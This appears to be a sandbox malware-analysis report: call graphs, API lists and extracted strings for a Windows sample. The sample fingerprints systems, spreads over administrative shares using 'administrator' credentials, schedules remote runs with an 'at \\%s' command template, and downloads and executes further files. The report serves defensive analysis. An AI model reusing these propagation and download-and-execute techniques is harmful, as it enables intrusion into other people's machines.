1630->1634 1631->1601 1632 4037a7 __WSAFDIsSet 1632->1630 1633 4037ba recv 1632->1633 1633->1631 1633->1634 1634->1630 1634->1631 1634->1632 1635->1560 1637 40513f CreateThread WaitForSingleObject CloseHandle closesocket Sleep 1636->1637 1637->1637 1638 4048aa 9 API calls 1637->1638 1687 40484f htons 1638->1687 1641 403492 2 API calls 1642 404955 memset 1641->1642 1643 406090 46 API calls 1642->1643 1644 404974 1643->1644 1692 4034e5 wsprintfA LoadLibraryA 1644->1692 1646 40497c memcpy send 1648 404e6b 1646->1648 1669 4049f0 1646->1669 1649 404a6b memset 1693 4037ea 1649->1693 1651 4037ea 3 API calls 1651->1669 1652 404e82 OpenMutexA 1655 404ea3 1652->1655 1656 404e95 ReleaseMutex CloseHandle 1652->1656 1653 404db7 GetTickCount wsprintfA 1668 404e1f LoadLibraryA GetProcAddress 1653->1668 1654 404cc5 OpenMutexA 1659 404cd8 ReleaseMutex CloseHandle 1654->1659 1676 404ce6 1654->1676 1660 40351a 5 API calls 1655->1660 1656->1655 1657 404bf6 lstrcpyn 1662 403135 137 API calls 1657->1662 1658 404c5b GetDesktopWindow ShellExecuteA 1658->1649 1659->1676 1665 404ea9 memset sprintf SHDeleteKeyA 1660->1665 1662->1669 1663 404b75 lstrcpyn lstrlen lstrcpyn 1666 403280 137 API calls 1663->1666 1664 404b07 lstrcpyn lstrlen lstrcpyn 1667 403311 137 API calls 1664->1667 1670 404f7d 1665->1670 1666->1669 1667->1669 1672 404e48 WinExec 1668->1672 1669->1648 1669->1649 1669->1651 1669->1652 1669->1653 1669->1654 1669->1657 1669->1658 1669->1663 1669->1664 1671 40355b 12 API calls 1670->1671 1674 404f82 ExitProcess 1671->1674 1672->1649 1673 406bd0 LoadLibraryA GetProcAddress 1673->1676 1676->1673 1677 406bd0 2 API calls 1676->1677 1678 404d57 wsprintfA 1677->1678 1679 404d81 LoadLibraryA GetProcAddress 1678->1679 1680 404daa 1679->1680 1680->1649 1681 404f89 1680->1681 1682 40351a 5 API calls 1681->1682 1683 404f8f memset sprintf SHDeleteKeyA 1682->1683 1684 405063 1683->1684 1685 40355b 12 API calls 1684->1685 1686 405068 WinExec ExitProcess 1685->1686 1688 406c10 4 API calls 1687->1688 1689 404875 socket connect 1688->1689 1690 4048a5 1689->1690 1691 404899 closesocket 1689->1691 1690->1641 1690->1648 1691->1690 1692->1646 1694 403803 select 1693->1694 1695 4037fe 1693->1695 1694->1695 1698 403835 1694->1698 1695->1669 1696 403839 __WSAFDIsSet 1696->1694 1697 40384c recv 1696->1697 1697->1695 1697->1698 1698->1694 1698->1695 1698->1696 1700 402a7d 1699->1700 1700->1565 1700->1566 1702 402b56 sprintf 1701->1702 1703 402b69 sprintf WNetAddConnection2A 1701->1703 1702->1703 1704 402beb 1703->1704 1705 402d62 1703->1705 1727 402a92 GetModuleFileNameA 1704->1727 1705->1572 1707 402bf0 Sleep memset sprintf 1708 402c31 1707->1708 1728 402a92 GetModuleFileNameA 1708->1728 1710 402c3e CopyFileA 1711 402d68 GetLocalTime memset sprintf WinExec Sleep 1710->1711 1712 402c4a memset sprintf 1710->1712 1711->1705 1713 402c7b 1712->1713 1729 402a92 GetModuleFileNameA 1713->1729 1715 402c88 1715->1711 1716 402c94 memset sprintf 1715->1716 1717 402cc5 1716->1717 1730 402a92 GetModuleFileNameA 1717->1730 1719 402cd2 1719->1711 1720 402cde memset sprintf 1719->1720 1721 402d0f 1720->1721 1731 402a92 GetModuleFileNameA 1721->1731 1723 402d1c 1723->1711 1724 402d24 memset sprintf 1723->1724 1725 402d55 1724->1725 1732 402a92 GetModuleFileNameA 1725->1732 1727->1707 1728->1710 1729->1715 1730->1719 1731->1723 1732->1705

                                Callgraph

                                • Executed
                                • Not Executed
                                • Opacity -> Relevance
                                • Disassembly available
                                callgraph 0 Function_00407440 16 Function_00407350 0->16 1 Function_00404044 2 Function_00405244 3 Function_00406BC4 4 Function_004036C6 5 Function_00406BC7 6 Function_00405348 7 Function_00406A48 7->5 38 Function_0040597D 7->38 64 Function_00406BB2 7->64 8 Function_004050CA 35 Function_0040407C 8->35 9 Function_0040604B 10 Function_0040604D 20 Function_0040355B 10->20 11 Function_004029CE 61 Function_004027B0 11->61 12 Function_0040484F 45 Function_00406C10 12->45 13 Function_00402AD0 50 Function_00402A92 13->50 14 Function_00406BD0 47 Function_00408F90 14->47 15 Function_00406C50 29 Function_00408FF0 16->29 17 Function_00402DD5 17->13 19 Function_00402A59 17->19 18 Function_00403758 21 Function_004069E0 22 Function_004051E3 36 Function_0040507D 22->36 57 Function_00405126 22->57 23 Function_004027E4 44 Function_0040298D 23->44 24 Function_004034E5 25 Function_00408FE5 26 Function_004067E9 27 Function_004037EA 28 Function_0040336C 28->11 28->45 30 Function_00407470 30->0 30->14 30->15 39 Function_004085FE 30->39 41 Function_00408680 30->41 30->45 30->47 55 Function_00408620 30->55 56 Function_00407220 30->56 62 Function_00408FB0 30->62 31 Function_004086F0 31->14 31->41 31->45 31->47 31->55 32 Function_004059F4 33 Function_004085FB 34 Function_0040387C 34->4 34->14 34->20 34->24 34->28 40 Function_00403280 34->40 46 Function_00406090 34->46 49 Function_00403311 34->49 51 Function_00403492 34->51 53 Function_0040351A 34->53 65 Function_00403135 34->65 35->1 35->14 35->18 35->20 35->24 35->40 35->46 35->49 35->51 35->53 35->65 37 Function_004030FD 37->34 38->20 38->32 48 Function_00405B10 38->48 40->37 42 Function_00405182 42->8 42->36 43 Function_0040588B 46->21 48->10 48->14 49->37 52 Function_00403114 54 Function_00406B9A 56->29 59 Function_004048AA 57->59 58 Function_004027A8 59->12 59->14 59->20 59->24 59->27 59->40 59->46 59->49 59->51 59->53 59->65 60 Function_00408130 60->39 60->45 60->47 60->55 60->62 61->44 63 Function_00406DB0 63->14 63->41 63->45 63->62 65->37 66 Function_00405336 67 Function_00402A37 68 Function_004055BC 68->6 68->17 68->22 68->24 68->37 68->42 68->66

                                Executed Functions

                                Function 00406090 Relevance: 145.8, APIs: 48, Strings: 35, Instructions: 522libraryregistrystringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 258 406090-40623a LoadLibraryA GetProcAddress LoadLibraryA GetProcAddress GetSystemDefaultUILanguage memset 260 40625c-406263 258->260 261 40623c-406259 _mbscpy 258->261 262 406265-40626c 260->262 263 40628b-406292 260->263 261->260 262->263 266 40626e-406288 _mbscpy 262->266 264 406294-40629b 263->264 265 4062bd-4062c4 263->265 264->265 267 40629d-4062ba _mbscpy 264->267 268 4062c6-4062cd 265->268 269 4062ef-4062f6 265->269 266->263 267->265 268->269 270 4062cf-4062ec _mbscpy 268->270 271 4062f8-4062ff 269->271 272 40634d-406354 269->272 270->269 271->272 273 406301-40630c 271->273 274 406356-40635d 272->274 275 4063ac-4063b3 272->275 278 40632d-40634a _mbscpy 273->278 279 40630e-40632b _mbscpy 273->279 274->275 280 40635f-40636b 274->280 276 4063b5-4063bc 275->276 277 40640e-406415 275->277 276->277 281 4063be-4063ca 276->281 282 406440-406508 sprintf _mbscpy lstrcpy RegOpenKeyExA 277->282 283 406417-40641e 277->283 278->272 279->272 284 40638c-4063a9 _mbscpy 280->284 285 40636d-40638a _mbscpy 280->285 286 4063cc-4063ec _mbscpy 281->286 287 4063ee-40640b _mbscpy 281->287 289 4065d6-406652 _mbscpy 282->289 290 40650e-4065d4 RegQueryValueExA RegCloseKey GetSystemInfo memset sprintf _mbscpy 282->290 283->282 288 406420-40643d _mbscpy 283->288 284->275 285->275 286->277 287->277 288->282 291 406655-4066e5 GlobalMemoryStatusEx call 4069e0 * 2 wsprintfA malloc GetAdaptersInfo 289->291 290->291 296 406704-406713 GetAdaptersInfo 291->296 297 4066e7-406701 free malloc 291->297 298 406953-406967 free 296->298 299 406719-40671d 296->299 297->296 300 406974-406986 298->300 301 406969-40696f GetTickCount 298->301 299->298 302 406723-40673b strcmp 299->302 301->300 303 406741-406781 GetIfTable 302->303 304 406946-40694e 302->304 303->304 305 406787-4067af ??2@YAPAXI@Z 303->305 304->299 305->304 306 4067b5-4067d7 GetIfTable 305->306 307 40692b-406943 ??3@YAXPAX@Z 306->307 308 4067dd-406806 306->308 307->304 308->307 310 40680c-406826 308->310 311 406926 310->311 312 40682c-406846 310->312 312->311 313 40684c-40686e 312->313 313->311 314 406874-4068af 313->314 315 4068f1-406923 sprintf _mbscpy 314->315 316 4068b1-4068ef sprintf _mbscpy 314->316 315->311 316->311
                                APIs
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCloseKey,76F8F550), ref: 004060A4
                                • GetProcAddress.KERNEL32(00000000), ref: 004060AB
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,GetVersionExA), ref: 004060C1
                                • GetProcAddress.KERNEL32(00000000), ref: 004060C8
                                • GetSystemDefaultUILanguage.KERNEL32 ref: 004060D4
                                • memset.MSVCRT ref: 004060F2
                                • _mbscpy.MSVCRT(0000005D,0000004E), ref: 00406254
                                • _mbscpy.MSVCRT(0000005D,2000), ref: 00406283
                                • _mbscpy.MSVCRT(0000005D,00000058), ref: 004062B5
                                • _mbscpy.MSVCRT(0000005D,2003), ref: 004062E7
                                • _mbscpy.MSVCRT(0000005D,Vista), ref: 00406323
                                • _mbscpy.MSVCRT(0000005D,2008), ref: 00406345
                                • _mbscpy.MSVCRT(0000005D,00000037), ref: 00406382
                                • _mbscpy.MSVCRT(0000005D,2008R2), ref: 004063A4
                                • _mbscpy.MSVCRT(0000005D,00000038), ref: 004063E4
                                • _mbscpy.MSVCRT(0000005D,2012), ref: 00406406
                                • _mbscpy.MSVCRT(0000005D,8.1), ref: 00406438
                                • sprintf.MSVCRT ref: 0040649C
                                • _mbscpy.MSVCRT(0000005D,?), ref: 004064B3
                                • lstrcpy.KERNEL32(00000000,HARDWARE\DESCRIPTION\System\CentralProcessor\0), ref: 004064E0
                                • RegOpenKeyExA.KERNELBASE(80000002,00000000,00000000,000F003F,?), ref: 00406500
                                • RegQueryValueExA.KERNELBASE(?,~MHz,00000000,00000004,?,000000C8), ref: 00406545
                                • RegCloseKey.KERNELBASE(?), ref: 00406552
                                • GetSystemInfo.KERNELBASE(?), ref: 0040655F
                                • memset.MSVCRT ref: 00406570
                                • sprintf.MSVCRT ref: 004065B5
                                • _mbscpy.MSVCRT(-00000003,?), ref: 004065CC
                                • _mbscpy.MSVCRT(-00000003,Find CPU Error), ref: 0040664D
                                • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 00406666
                                • __aulldiv.LIBCMT ref: 00406681
                                • __aulldiv.LIBCMT ref: 0040668F
                                • wsprintfA.USER32 ref: 004066B4
                                • malloc.MSVCRT ref: 004066C9
                                • GetAdaptersInfo.IPHLPAPI(KVa7,00000000), ref: 004066DD
                                • free.MSVCRT ref: 004066EB
                                • malloc.MSVCRT ref: 004066F8
                                • GetAdaptersInfo.IPHLPAPI(KVa7,00000000), ref: 0040670C
                                • strcmp.MSVCRT ref: 00406731
                                • GetIfTable.IPHLPAPI(00000000,00000000,00000001), ref: 0040676F
                                • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,KVa7,00000000,?,?,?,00000400,00000000), ref: 0040678E
                                • GetIfTable.IPHLPAPI(00000000,00000000,00000001), ref: 004067C5
                                • sprintf.MSVCRT ref: 004068CD
                                • _mbscpy.MSVCRT(-00000023,?,?,?,?,?,?,?,KVa7,00000000,?,?,?,00000400,00000000), ref: 004068E7
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: _mbscpy$Infosprintf$AdaptersAddressLibraryLoadProcSystemTable__aulldivmallocmemset$??2@CloseDefaultGlobalLanguageMemoryOpenQueryStatusValuefreelstrcpystrcmpwsprintf
                                • String ID: %d*%u%s$%s %s %s%d$%u Gbps$%u MB$%u Mbps$0.0.0.0$2000$2003$2008$2008R2$2012$7$8$8.1$>2l$@$ADVAPI32.dll$Find CPU Error$GetVersionExA$HARDWARE\DESCRIPTION\System\CentralProcessor\0$KERNEL32.dll$KVa7$KVa7$MHz$N$P$P$RegCloseKey$S$T$Vista$Win$X$z$~MHz
                                • API String ID: 3282488517-2071344246
                                • Opcode ID: 63299a0e361551339f6c41bc8fa1acc0d5ed4ae0495ff8515c854c0289c22c81
                                • Instruction ID: 4060d5c4243dd63f8f5c6b2b41416773b41649e27dbdc5ec35ba0ab2f083b483
                                • Opcode Fuzzy Hash: 63299a0e361551339f6c41bc8fa1acc0d5ed4ae0495ff8515c854c0289c22c81
                                • Instruction Fuzzy Hash: 3B32B170904258DBEB21CB54CD48BDEBBB8AF15308F0440EDE14D7A291D7B99B98CF69
                                Function 00402AD0 Relevance: 86.0, APIs: 28, Strings: 21, Instructions: 249libraryloadersleepCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,CopyFileA,administrator,004095E4,00000000), ref: 00402AEC
                                • GetProcAddress.KERNEL32(00000000), ref: 00402AF5
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcpyA), ref: 00402B04
                                • GetProcAddress.KERNEL32(00000000), ref: 00402B07
                                • LoadLibraryA.KERNELBASE(mpr.dll), ref: 00402B11
                                • GetProcAddress.KERNEL32(00000000,WNetAddConnection2A), ref: 00402B19
                                • memset.MSVCRT ref: 00402B36
                                • lstrcmp.KERNEL32(004030B7,NULL), ref: 00402B46
                                • sprintf.MSVCRT ref: 00402B64
                                  • Part of subcall function 00402A92: GetModuleFileNameA.KERNELBASE(00000000,00000000,00000104,00000001), ref: 00402AC1
                                • sprintf.MSVCRT ref: 00402BA6
                                • WNetAddConnection2A.MPR(?,004030B7,?,00000000), ref: 00402BDF
                                • Sleep.KERNELBASE(000000C8), ref: 00402BF5
                                • memset.MSVCRT ref: 00402C09
                                • sprintf.MSVCRT ref: 00402C1D
                                • CopyFileA.KERNEL32(00000000,?,00000000), ref: 00402C3F
                                • memset.MSVCRT ref: 00402C53
                                • sprintf.MSVCRT ref: 00402C67
                                • memset.MSVCRT ref: 00402C9D
                                • sprintf.MSVCRT ref: 00402CB1
                                • memset.MSVCRT ref: 00402CE7
                                • sprintf.MSVCRT ref: 00402CFB
                                • memset.MSVCRT ref: 00402D2D
                                • sprintf.MSVCRT ref: 00402D41
                                • GetLocalTime.KERNEL32(?), ref: 00402D6C
                                • memset.MSVCRT ref: 00402D7B
                                • sprintf.MSVCRT ref: 00402DA2
                                • WinExec.KERNEL32(?,00000000), ref: 00402DAF
                                • Sleep.KERNEL32(000007D0), ref: 00402DC4
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: sprintf$memset$AddressLibraryLoadProc$FileSleep$Connection2CopyExecLocalModuleNameTimelstrcmp
                                • String ID: "%s"$C:\g1fd.exe$CopyFileA$D:\g1fd.exe$E:\g1fd.exe$F:\g1fd.exe$KERNEL32.dll$KERNEL32.dll$NULL$WNetAddConnection2A$\\%s\C$\NewArean.exe$\\%s\D$\g1fd.exe$\\%s\E$\g1fd.exe$\\%s\F$\g1fd.exe$\\%s\admin$\g1fd.exe$\\%s\ipc$$admin$\$administrator$at \\%s %d:%d %s$lstrcpyA$mpr.dll
                                • API String ID: 3609035092-2620952620
                                • Opcode ID: c6549ada33351b0c644b47774686d60c5db2e3ebc40509c19cd79e523bc9d003
                                • Instruction ID: e53371337d95753037d5ff201a014897057a964265bdb027f625b62809e70f56
                                • Opcode Fuzzy Hash: c6549ada33351b0c644b47774686d60c5db2e3ebc40509c19cd79e523bc9d003
                                • Instruction Fuzzy Hash: EF810CB1D0065DBACF10ABE5CD89EDE7B7CAF4434AF1004B6F505F2190DA789A848F64
                                Function 0040597D Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 30networkCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • WSAStartup.WS2_32(00000202,?), ref: 00405992
                                  • Part of subcall function 004059F4: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCloseKey), ref: 00405A09
                                  • Part of subcall function 004059F4: GetProcAddress.KERNEL32(00000000), ref: 00405A10
                                  • Part of subcall function 004059F4: _mbscpy.MSVCRT(00000000,00000053), ref: 00405AC6
                                  • Part of subcall function 004059F4: _mbscat.MSVCRT ref: 00405AD7
                                  • Part of subcall function 004059F4: RegOpenKeyExA.KERNELBASE(80000002,00000000,00000000,000F003F,?), ref: 00405AF6
                                • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 004059BB
                                • ExitProcess.KERNEL32 ref: 004059EE
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressCtrlDispatcherExitLibraryLoadOpenProcProcessServiceStartStartup_mbscat_mbscpy
                                • String ID: Defghi Klmnopqr Tuv$Defghi Klmnopqr Tuvwxyab Defg$Defghijk Mnopqrstu Wxyabcd Fghijklm Opq
                                • API String ID: 3970724158-1370363722
                                • Opcode ID: d3fd74ce98b53abc42bac9d52cecb53f35e43ddc26a07d1a38ab2e21b0d9893f
                                • Instruction ID: 2c600e66c56aa54e41322d3d423351a33ef688bbf1abba83ec879d044cf264d1
                                • Opcode Fuzzy Hash: d3fd74ce98b53abc42bac9d52cecb53f35e43ddc26a07d1a38ab2e21b0d9893f
                                • Instruction Fuzzy Hash: E8F090B0950209BBDB10BB919C0E7AE76B8EB0430AF40403AE501B00E2DBB85648CF6E
                                Function 0040407C Relevance: 207.1, APIs: 45, Strings: 73, Instructions: 556librarystringloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 0 40407c-40410c Sleep LoadLibraryA GetProcAddress LoadLibraryA GetProcAddress LoadLibraryA GetProcAddress LoadLibraryA GetProcAddress call 404044 2 404111-404119 0->2 3 40464f-404653 2->3 4 40411f-404151 call 403492 memset call 406090 call 4034e5 2->4 11 404153 4->11 12 40415a-404161 4->12 11->12 13 404163 12->13 14 404167-40416e 12->14 13->14 15 404170 14->15 16 404174-4041bc memcpy send 14->16 15->16 17 4041c2-404238 16->17 18 404646 16->18 19 40423d-404268 memset call 403758 17->19 18->3 22 40463d 19->22 23 40426e-40428b call 403758 19->23 22->18 23->22 26 404291-40429a 23->26 27 4042a0 26->27 28 404418-40441b 26->28 29 404654-404665 OpenMutexA 27->29 30 4042a6-4042a8 27->30 31 404421-404423 28->31 32 404589-404621 GetTickCount wsprintfA LoadLibraryA GetProcAddress 28->32 37 404675-404755 call 40351a memset sprintf SHDeleteKeyA call 40355b ExitProcess 29->37 38 404667-40466f ReleaseMutex CloseHandle 29->38 33 4043c8-40440d lstrcpyn call 403135 30->33 34 4042ae-4042af 30->34 35 404425-404427 31->35 36 404497-4044a8 OpenMutexA 31->36 66 404623-404626 32->66 67 404628 32->67 49 404412-404413 33->49 40 4042b5-4042b6 34->40 41 404347-4043c6 lstrcpyn lstrlen lstrcpyn call 403280 34->41 35->19 42 40442d-404492 GetDesktopWindow ShellExecuteA 35->42 43 4044b8-40457e call 406bd0 * 5 wsprintfA LoadLibraryA GetProcAddress 36->43 44 4044aa-4044b2 ReleaseMutex CloseHandle 36->44 38->37 50 4042b8-4042b9 40->50 51 4042d9-404342 lstrcpyn lstrlen lstrcpyn call 403311 40->51 41->49 42->19 79 404584 43->79 80 40475b-404849 call 40351a memset sprintf SHDeleteKeyA call 40355b WinExec ExitProcess 43->80 44->43 49->19 50->19 54 4042bb-4042cc 50->54 51->49 54->19 58 4042d2-4042d4 54->58 58->19 70 40462a-404638 WinExec 66->70 67->70 70->19 79->19
                                APIs
                                • Sleep.KERNELBASE(00004650), ref: 0040408D
                                • LoadLibraryA.KERNEL32(kernel32.dll,?), ref: 004040CB
                                • GetProcAddress.KERNEL32(00000000), ref: 004040D4
                                • LoadLibraryA.KERNEL32(kernel32.dll,GetTempPathA), ref: 004040E0
                                • GetProcAddress.KERNEL32(00000000), ref: 004040E3
                                • LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 004040F2
                                • GetProcAddress.KERNEL32(00000000), ref: 004040F5
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA), ref: 00404104
                                • GetProcAddress.KERNEL32(00000000), ref: 00404107
                                  • Part of subcall function 00404044: socket.WS2_32(00000002,00000001,00000000), ref: 0040404E
                                  • Part of subcall function 00404044: connect.WS2_32(00000000,?,00000010), ref: 0040405E
                                  • Part of subcall function 00404044: closesocket.WS2_32(00000000), ref: 0040406A
                                  • Part of subcall function 00403492: setsockopt.WS2_32(?,0000FFFF,00000008,?,00000004), ref: 004034A8
                                  • Part of subcall function 00403492: WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 004034DD
                                • memset.MSVCRT ref: 00404135
                                  • Part of subcall function 00406090: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCloseKey,76F8F550), ref: 004060A4
                                  • Part of subcall function 00406090: GetProcAddress.KERNEL32(00000000), ref: 004060AB
                                  • Part of subcall function 00406090: LoadLibraryA.KERNEL32(KERNEL32.dll,GetVersionExA), ref: 004060C1
                                  • Part of subcall function 00406090: GetProcAddress.KERNEL32(00000000), ref: 004060C8
                                  • Part of subcall function 00406090: GetSystemDefaultUILanguage.KERNEL32 ref: 004060D4
                                  • Part of subcall function 00406090: memset.MSVCRT ref: 004060F2
                                  • Part of subcall function 00406090: _mbscpy.MSVCRT(0000005D,0000004E), ref: 00406254
                                  • Part of subcall function 00406090: _mbscpy.MSVCRT(0000005D,2000), ref: 00406283
                                  • Part of subcall function 004034E5: wsprintfA.USER32 ref: 004034FC
                                  • Part of subcall function 004034E5: LoadLibraryA.KERNELBASE(?), ref: 0040350C
                                • memcpy.MSVCRT(?,?,000000B0), ref: 00404193
                                • send.WS2_32(?,?,00000000), ref: 004041B3
                                • memset.MSVCRT ref: 0040424A
                                • lstrcpyn.KERNEL32(00409328,?,00000080), ref: 004042EB
                                • lstrlen.KERNEL32(00409328,00000200), ref: 004042F7
                                • lstrcpyn.KERNEL32(004093A8,?), ref: 0040430A
                                • lstrcpyn.KERNEL32(004090E0,?,00000080), ref: 0040439B
                                • lstrlen.KERNEL32(004090E0,00000080), ref: 004043A7
                                • lstrcpyn.KERNEL32(00409160,?), ref: 004043BA
                                • lstrcpyn.KERNEL32(004091F8,?,00000104), ref: 004043DA
                                • GetDesktopWindow.USER32 ref: 00404485
                                • ShellExecuteA.SHELL32(00000000), ref: 0040448C
                                • OpenMutexA.KERNEL32(001F0001,00000000,Defghi Klmnopqr Tuv), ref: 0040449E
                                • ReleaseMutex.KERNEL32(00000000), ref: 004044AB
                                • CloseHandle.KERNEL32(00000000), ref: 004044B2
                                • wsprintfA.USER32 ref: 00404539
                                • LoadLibraryA.KERNEL32(urlmon.dll), ref: 00404557
                                • GetProcAddress.KERNEL32(00000000,URLDownloadToFileA), ref: 00404562
                                • GetTickCount.KERNEL32 ref: 004045C4
                                • wsprintfA.USER32 ref: 004045D7
                                • LoadLibraryA.KERNEL32(urlmon.dll), ref: 004045F5
                                • GetProcAddress.KERNEL32(00000000,URLDownloadToFileA), ref: 00404600
                                • WinExec.KERNEL32(?,00000000), ref: 00404632
                                • OpenMutexA.KERNEL32(001F0001,00000000,Defghi Klmnopqr Tuv), ref: 0040465B
                                • ReleaseMutex.KERNEL32(00000000), ref: 00404668
                                • CloseHandle.KERNEL32(00000000), ref: 0040466F
                                • memset.MSVCRT ref: 0040468A
                                • sprintf.MSVCRT ref: 0040472B
                                • SHDeleteKeyA.SHLWAPI(80000002,?), ref: 00404740
                                  • Part of subcall function 0040355B: LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA,00000000,Defghi Klmnopqr Tuv,00000000), ref: 00403571
                                  • Part of subcall function 0040355B: GetProcAddress.KERNEL32(00000000), ref: 00403578
                                  • Part of subcall function 0040355B: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004035D3
                                  • Part of subcall function 0040355B: GetShortPathNameA.KERNEL32(?,?,00000104), ref: 004035E8
                                  • Part of subcall function 0040355B: GetEnvironmentVariableA.KERNEL32(COMSPEC,?,00000104), ref: 004035FB
                                  • Part of subcall function 0040355B: ShellExecuteEx.SHELL32(0000003C), ref: 00403675
                                  • Part of subcall function 0040355B: SetPriorityClass.KERNEL32(?,00000040), ref: 00403689
                                  • Part of subcall function 0040355B: GetCurrentProcess.KERNEL32(00000100), ref: 00403690
                                  • Part of subcall function 0040355B: SetPriorityClass.KERNEL32(00000000), ref: 00403697
                                  • Part of subcall function 0040355B: GetCurrentThread.KERNEL32 ref: 0040369B
                                • ExitProcess.KERNEL32 ref: 00404755
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoad$AddressProc$lstrcpyn$Mutexmemset$wsprintf$ClassCloseCurrentExecuteHandleNameOpenPriorityProcessReleaseShell_mbscpylstrlen$CountDefaultDeleteDesktopEnvironmentExecExitFileIoctlLanguageModulePathShortSleepSystemThreadTickVariableWindowclosesocketconnectmemcpysendsetsockoptsocketsprintf
                                • String ID: %c%c%c%c%ccn.exe$%s%s$%s%s$.$C$C$Defghi Klmnopqr Tuv$E$F$GetTempPathA$KERNEL32.dll$M$S$S$S$S$T$URLDownloadToFileA$W$WS2_32.dll$Y$\$\$\$c$closesocket$e$e$e$e$e$e$e$e$e$e$e$i$i$i$i$kernel32.dll$kernel32.dll$l$l$l$lstrcatA$n$n$n$o$o$o$o$p$p$r$r$r$r$r$r$s$t$t$t$t$u$urlmon.dll$v$w$x$x
                                • API String ID: 2150264698-2364854850
                                • Opcode ID: 6b4924f4a127d18a0a032bdd380913539c2cdcbc85c7c5ccdd420771a7168c92
                                • Instruction ID: 67642873343b6f7d73ea264a9ba1336f7ce8e91893947de594fae40b13c7bc8e
                                • Opcode Fuzzy Hash: 6b4924f4a127d18a0a032bdd380913539c2cdcbc85c7c5ccdd420771a7168c92
                                • Instruction Fuzzy Hash: 16329771D042C8EEEB11DBA4CD48BDE7FB96B55304F0400A9E144B7292C7BE5A58CB7A
                                Function 004048AA Relevance: 207.1, APIs: 45, Strings: 73, Instructions: 556librarystringloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
